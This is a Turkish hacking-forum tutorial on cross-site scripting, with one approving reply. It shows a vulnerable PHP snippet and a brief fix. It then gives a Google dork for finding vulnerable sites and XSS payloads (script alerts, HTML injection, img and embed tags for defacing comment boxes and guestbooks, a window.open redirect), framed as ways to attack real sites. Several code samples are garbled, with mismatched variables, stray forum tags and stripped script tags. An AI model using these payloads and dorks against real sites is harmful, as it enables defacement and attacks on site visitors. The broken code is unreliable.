Xss Açığı Detaylı Bir Şekilde Anlatımı

'Hack Dökümanları' forumunda FamedabLe tarafından 2 Temmuz 2018 tarihinde açılan konu

Etiketler:
  1. FamedabLe

    FamedabLe Gümüş Üye

    Mesaj:
    169
    Beğeniler:
    131
    Cinsiyet:
    Erkek
    • Merhaba powerhack ailesi bugün xss açığını anlatacağız.​
    • 1) XSS Nedir ?​
    • 2) XSS Açığı Nasıl Oluşur ?​
    • 3) XSS Açığını Kapatma ?​
    • 4) XSS Açığını Bulma Yöntemi ?​
    • 5) XSS Açığını Hackleme ?​
    • Anlatıma Geçelim Artık !​
    • 1) XSS NEDİR ? ​
    • XSS Cross Site Scripting olarak bilinen web uygulamalarında mevcut olan çok ​
    • yaygın bir açıktır.XSS atak yapan kişinin zararlı kodlarını inject etmesine​
    • dayananır.Kullanıcıya yönelik saldırı yapabiliriz.Sql açığı gibi servera degil.​
    • 2) XSS AÇIĞI NASIL OLUŞUR ?​
    • XSS açıkları bir değişkenin değerinin var olup olmadığını kontrol etmeden​
    • değişkenin yansıtılmasından meydana gelir.​
    Örneğin :
    Kod:
    <?php
    
    $tht = $_GET[’byrool1];
    echo $byrool
    ?>
    Yukarıdaki kodlarda byrool değişkeni echo ile yansıtılmış.Ancak GET metoduyla
    byrool1 değeri nin kontrolu yapılmamış.Bu hata echo $byrool satırında XSS açığı
    meydana getirmektedir.

    3) XSS AÇIĞI NASIL KAPATILIR ?

    Eğer değişkenin değerinin var olup olmadığını kontrol edersek XSS açığını
    kapatmış oluruz.XSS açığını nasıl kapatırız örneğini verecek olursak;

    Kod:
    <?php
    Kod:
    [/B][/U][/B][/B][/LEFT]
    
    
    if(isset($_GET[’byrool’])) // Kontrol if $_GET[’byrool’] varmı? { echo htmlentities($_GET[’byrool’], ENT_QUOTES); // Yansıt ve encode kodlarla devam et } ?>​


    4) XSS AÇIĞI NASIL BULUNUR ?
    inurl:"search.php?q=" Google dorklarını kullanarak.

    5) XSS AÇIĞINI NASIL HACKLERİM ?
    **********alert("XSS")</script>

    Bu kod ile bir popup uyarı mesajı karşımıza çıkacaktır.Şimdi yukarda verdiğimiz
    dork örneği ile XSS saldırı tipini belirleyelim:

    http://site.com/search.php?q=**********alert("XSS")</script>

    Evet popup uyarısı geldi.
    XSS ile yapılan yanlışlardan bir tanesi herkesin sadece javascript kod inject
    edildiğini düşünmesi.Oysaki:

    http://site.com/search.php?q=<br><br><u>XSS</u>

    Bu inject çeşidindede bold yazısı ile de hata alabiliyoruz.

    XSS açıklarının nasıl çalıştığını anladık.Şimdi Deface yöntemleri üzerinde,
    duralım.

    İlk yöntemimiz Html tag’ı olarak bilinen <img > etiketi.XSS açığı var
    olan bir web sitesinin üzerine grafiğimizi bağlayabiliriz.

    <html><bOdy><IMG src= "http://site/resim.png></bOdy></html>

    Yukarda nedemek istediğimi verdiğim koda geçerli bir resim adresini girip
    uyguladığınız zaman anlarsınız.

    XSS kodumuzu pano yada ziyaretçi defteri yada yorum kutularına girdiğimiz
    zaman web site kullanıcıları burayı ziyaret ettiği zaman:

    <IMG src= "http://site.com/yourDefaceIMAGE.png"> kodumuz ile resmin olduğu
    sayfaya yöneleceklerdir.

    Diğer bir yöntem flash video yöntemi.

    <EMBED src= "http://site.com/xss.swf">

    Kodlarımız ile ziyaretçilere eşsiz bir görsel şölen sunabiliriz.

    Yada yönlendirme kodu atabiliriz.

    **********window.open( "Google" )</script>

    Yukardaki kodumuz ile XSS bulduğumuz zayfaları yönlendirebiliriz.​
     
    kurmayturk ve acemihacker bunu beğendi.
  2. kurmayturk

    kurmayturk Sicil temiz.. Gümüş Üye

    Mesaj:
    188
    Beğeniler:
    78
    Cinsiyet:
    Erkek
    Açıklama güzel , bu tarz konularda aslında görsel anlatım çok önemli bi örnek sayfa ile yapıldığında daha etkili oluyor , eline sağlık teşekkürler
     
Yükleniyor...

Bu Sayfayı Paylaş